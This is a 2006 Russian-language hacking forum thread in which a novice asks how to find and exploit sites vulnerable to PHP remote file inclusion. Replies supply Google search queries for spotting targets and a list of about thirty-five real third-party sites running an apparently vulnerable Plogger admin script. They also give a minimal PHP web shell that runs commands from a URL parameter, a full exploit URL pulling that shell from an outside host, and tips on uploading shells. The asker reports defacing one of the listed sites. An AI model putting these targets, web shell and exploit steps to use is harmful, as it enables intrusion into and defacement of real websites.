Php инклудинг

Discussion in 'PHP' started by fram, 11 Jan 2006.

  1. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Привет!Может ктонибуть подсказать как искать сайты с пхп инжекцией!Я вчера полинета перерыл но нашел только один!!Подскжите как их искать или скажите несколько сайтов у которых есть эта уезвимость!ПЛИИЗ!
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Есть такое понятие поисковик! =)

    Есть такое понятие поисковик! =)

    Юзай www.Google.ru

    Можно искать запросами:
    inurl:"page.php?page=" filetype:php
    inurl:"index.php?page=" filetype:php
    inurl:"page.php?page=" site:.ru
    inurl:"page.php?p=" site:.ru
    inurl:"index.php?page=" site:.com

    Ну там много разных вариаций.
     
  3. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    половина из них сдохла, но может найдешь действующие

    на удаленом хосте должен быть файл plog-functions.php

    HTML:
    http://www.magnapop.com/photos/admin/plog-admin-functions.php?config[basedir]=
    http://www.mindcyber.com/wallpaper/admin/plog-admin-functions.php?config[basedir]=
    http://www.kasnews.de/kunst/admin/plog-admin-functions.php?config[basedir]=
    http://www.distortion2static.com/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://www.ncfiremuseum.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
    http://kelly.greneaux.com/pictures/admin/plog-admin-functions.php?config[basedir]=
    http://216.22.25.215/~neeners/classic/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://musicbc.org/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
    http://www.samson-mfg.com/gallery2/admin/plog-admin-functions.php?config[basedir]=
    http://www.z90.com/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://www.dogtopia.biz/photos/admin/plog-admin-functions.php?config[basedir]=
    http://www.wilcofoppen.com/plogger/admin/plog-admin-functions.php?config[basedir]=
    http://www.aabany.org/blog/galeria/admin/plog-admin-functions.php?config[basedir]=
    http://www.newdesire.org/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://www.boricuapower.net/plogger/admin/plog-admin-functions.php?config[basedir]=
    http://www.aurorapemper.com/pictures/admin/plog-admin-functions.php?config[basedir]=
    http://91x.com/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://www.helpanimalsinc.org/pictures/admin/plog-admin-functions.php?config[basedir]=
    http://www.trieste.si/miramare/plogger/admin/plog-admin-functions.php?config[basedir]=
    http://dougal.gunters.org/test/plog/admin/plog-admin-functions.php?config[basedir]=
    http://photos.pivwan.net/admin/plog-admin-functions.php?config[basedir]=
    http://letatou.info/galerie/admin/plog-admin-functions.php?config[basedir]=
    http://theg3nius.com/photoblog/admin/plog-admin-functions.php?config[basedir]=
    http://www.diazvillanueva.com/fotografia/admin/plog-admin-functions.php?config[basedir]=
    http://www.hunder.ca/plogger/admin/plog-admin-functions.php?config[basedir]=
    http://www.coyforce.com/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://www.ourense.com/galerias/admin/plog-admin-functions.php?config[basedir]=
    http://www.fjellbruk.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
    http://www.karlshusgarasjene.no/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
    http://www.uitvaartbeurs.info/ploggerb2/admin/plog-admin-functions.php?config[basedir]=
    http://caraga.dost.gov.ph/photoblog/admin/plog-admin-functions.php?config[basedir]=
    http://www.rudylacy.com/photos/admin/plog-admin-functions.php?config[basedir]=
    http://www.thefinalfantasy.com/picturepost/admin/plog-admin-functions.php?config[basedir]=
    http://www.azadadventures.com/gallery/admin/plog-admin-functions.php?config[basedir]=
    http://galleria.aainaa.com/admin/plog-admin-functions.php?config[basedir]=
     
  4. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Ну чёт я не понял!!Я нашел сайт с инжекцией!!!Нашел файл залил его к себе на сайт а мне пишут
    Fatal error: Cannot redeclare add_comment() (previously declared in /home/musicbco/public_html/ploggerb2/admin/plog-admin-functions.php:537) in http://site.narod.ru/plog-functions.php on line 377
     
  5. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    _________________________
  6. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    plog-functions.php должен быть шелл, либо от rst либо самописный, типа

    PHP:
    <?

    if (!empty(
    $_GET['cmd'])) {
    echo 
    '<pre>';
    system($_GET['cmd']);
    echo 
    '</pre>';
    exit;
    }

    ?>
    Плагиат Ж)

    Вот пример конечной ссылки:
    admin/plog-admin-functions.php?config[basedir]=http://Пурум-пум-пум.narod.ru&cmd=id;pwd;uname+-a;ls+-la

    причем http://Пурум-пум-пум.narod.ru/plog-functions.php это шелл-код
     
    #6 max_pain89, 11 Jan 2006
    Last edited: 11 Jan 2006
  7. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    max_pain89!я нашел из списка сайт!Дефейснул его как ты сказал!!!!На пиши плиииззз описание этой уязвимости и как её искать
     
  8. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Кстати я залил в файл plog-functions.php шелл r57shell.php!начал дефейсить!Но выходит сообщение
    Parse error: parse error, unexpected $, expecting ')' in http://framhack.narod.ru/plog-functions.php on line 787
    что это и как можно исправить
     
  9. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    анти4ат против дефэйсов
     
  10. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    ОК!Небуду дефейсить!Ну расскажи!ПЛИЗ!
     
  11. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    это связано с тем, что не успевает скачаться код, лучше сначало закачай шелл в доступную папку ( по дефолту ../uploads)
     
  12. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    хм!А какими командами или как их туда залить
     
  13. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Кстати!А где можно скачать статьи по инклуду,подробное описани атаки и самой уезвимости
     
  14. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    Качалок много, популярные wget, fetch, curl. Синтакс где-нито сам найди. А на счет статей не знаю.
     
  15. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    http://forum.antichat.ru/thread12123.html
     
  16. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
  17. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    _________________________
  18. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    ОК!:))
     
  19. fram

    fram New Member

    Joined:
    24 Jul 2005
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    А что означает сообщение
    Warning: main(inc/plantillas/): failed to open stream: No such file or directory in /home/guiamani/public_html/page.php on line 17

    Warning: main(inc/plantillas/): failed to open stream: No such file or directory in /home/guiamani/public_html/page.php on line 17

    Warning: main(): Failed opening 'inc/plantillas/' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/guiamani/public_html/page.php on line 17
     
  20. Trinux

    Trinux Members of Antichat

    Joined:
    26 Nov 2004
    Messages:
    1,403
    Likes Received:
    296
    Reputations:
    364
    fram, ты прикалываешься? Надеюсь что да =)))
    Это значит что файла или директории не существует по указанному пути
     
    _________________________